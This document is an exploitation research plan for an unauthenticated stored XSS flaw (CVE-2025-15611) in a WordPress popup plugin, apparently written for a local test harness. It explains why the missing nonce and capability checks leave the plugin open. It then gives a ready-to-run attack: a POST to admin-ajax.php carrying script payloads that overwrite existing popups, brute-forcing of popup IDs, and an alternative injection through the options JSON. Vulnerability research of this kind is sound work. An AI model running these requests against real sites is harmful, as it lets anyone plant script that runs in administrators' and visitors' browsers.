Exploitation Research Plan - CVE-2025-15611 (Popup Box Plugin)

1. Vulnerability Summary

The Popup Box – Create Countdown, Coupon, Video, Contact Form Popups plugin for WordPress is vulnerable to Unauthenticated Stored Cross-Site Scripting (XSS) in versions up to and including 5.4.9.

The vulnerability exists because the plugin registers a handler for popup creation and updates on the admin_init hook (via the Ays_Pb_Admin class). This handler includes the file admin/partials/actions/ays-pb-admin-actions.php, which processes $_POST data to save popup configurations. Crucially, this file and the underlying saving method fail to verify nonces or user capabilities before performing database operations. Since admin_init is triggered for all requests to /wp-admin/admin-ajax.php (even for unauthenticated users), any visitor can modify existing popups or create new ones containing malicious JavaScript.

2. Attack Vector Analysis

• Endpoint: /wp-admin/admin-ajax.php (or any admin URL that triggers admin_init).
• HTTP Method: POST (with optional GET parameters for ID targeting).
• Authentication: None (Unauthenticated).
• Vulnerable Parameters:
  • ays_pb_title
  • ays_pb_description
  • ays_pb_content
  • Any field within the options JSON structure processed by add_or_edit_popupbox().
• Preconditions: The plugin must be active. To overwrite an existing popup, the attacker needs its ID (usually starts at 1 and increments).

3. Code Flow

1. Entry Point: A request is made to /wp-admin/admin-ajax.php.
2. Hook Trigger: WordPress fires the admin_init hook.
3. Plugin Handler: The plugin's admin class (likely Ays_Pb_Admin) has a method hooked to admin_init.
4. Partial Inclusion: This method includes admin/partials/actions/ays-pb-admin-actions.php (confirmed in source).
5. Vulnerable Logic:
   • ays-pb-admin-actions.php checks if isset($_POST['ays_submit']).
   • It captures the popup ID from $_GET['popupbox'] and assigns it to $_POST['id'].
   • It calls $this->popupbox_obj->add_or_edit_popupbox().
6. Data Sink: add_or_edit_popupbox() (in includes/class-ays-pb-admin.php, inferred) takes the raw $_POST data and saves it to the {wpdb_prefix}ays_pb table.
7. Rendering: When an admin views the popup list or a user visits a page where the popup is displayed, the unsanitized title or content is rendered, executing the injected script.

4. Nonce Acquisition Strategy

No nonce is required.
The provided source file admin/partials/actions/ays-pb-admin-actions.php explicitly checks for the presence of $_POST['ays_submit'] but contains no calls to check_admin_referer() or wp_verify_nonce().

// admin/partials/actions/ays-pb-admin-actions.php

if (isset($_POST['ays_submit']) || isset($_POST['ays_submit_top'])) {
    $_POST['id'] = $id;
    $this->popupbox_obj->add_or_edit_popupbox();
}

5. Exploitation Strategy

The exploit will perform an unauthenticated POST request to /wp-admin/admin-ajax.php to overwrite an existing popup with a malicious payload.

Step-by-Step Plan:

1. Identify Popup ID: Popups typically start with ID 1. We will target popupbox=1.
2. Craft Payload: A standard XSS payload <script>alert(document.domain)</script>.
3. Execute HTTP Request: Use http_request to send the payload.

HTTP Request Details:

• URL: http://localhost:8080/wp-admin/admin-ajax.php?popupbox=1
• Method: POST
• Headers:
  • Content-Type: application/x-www-form-urlencoded
• Body Parameters:
  • ays_submit: 1
  • ays_pb_title: Malicious Popup
  • ays_pb_content: <script>alert(document.domain)</script>
  • ays_pb_description: Stored XSS

6. Test Data Setup

Before executing the exploit, ensure at least one popup exists.

# Use WP-CLI to insert a dummy popup record into the database
wp db query "INSERT INTO \$(wp db prefix)ays_pb (title, content, options) VALUES ('Safe Popup', 'Normal Content', '{}')"

7. Expected Results

• The HTTP response from admin-ajax.php might be a redirect (302) or a success message (depending on how add_or_edit_popupbox handles the redirect).
• The database record for popup ID 1 will be updated with the malicious payload.
• Navigating to the admin page wp-admin/admin.php?page=ays-pb will trigger the XSS.

8. Verification Steps

After the exploit, verify the database state using WP-CLI:

# Check if the title was modified
wp db query "SELECT title, content FROM \$(wp db prefix)ays_pb WHERE id=1" --format=table

9. Alternative Approaches

If overwriting an existing ID fails (e.g., if ID 1 doesn't exist):

1. ID Discovery: Iterate popupbox=X from 1 to 20.
2. Creation Attempt: Try omitting the popupbox parameter in the GET query. If add_or_edit_popupbox() handles null IDs by creating a new record, the payload will be stored in a new popup.
3. Field Variation: Some versions of the plugin might store the content inside the options JSON. If ays_pb_content doesn't work, try injecting into the options parameter:
   • Body: ays_submit=1&options={"ays_pb_content":"<script>alert(1)</script>"} (URL encoded).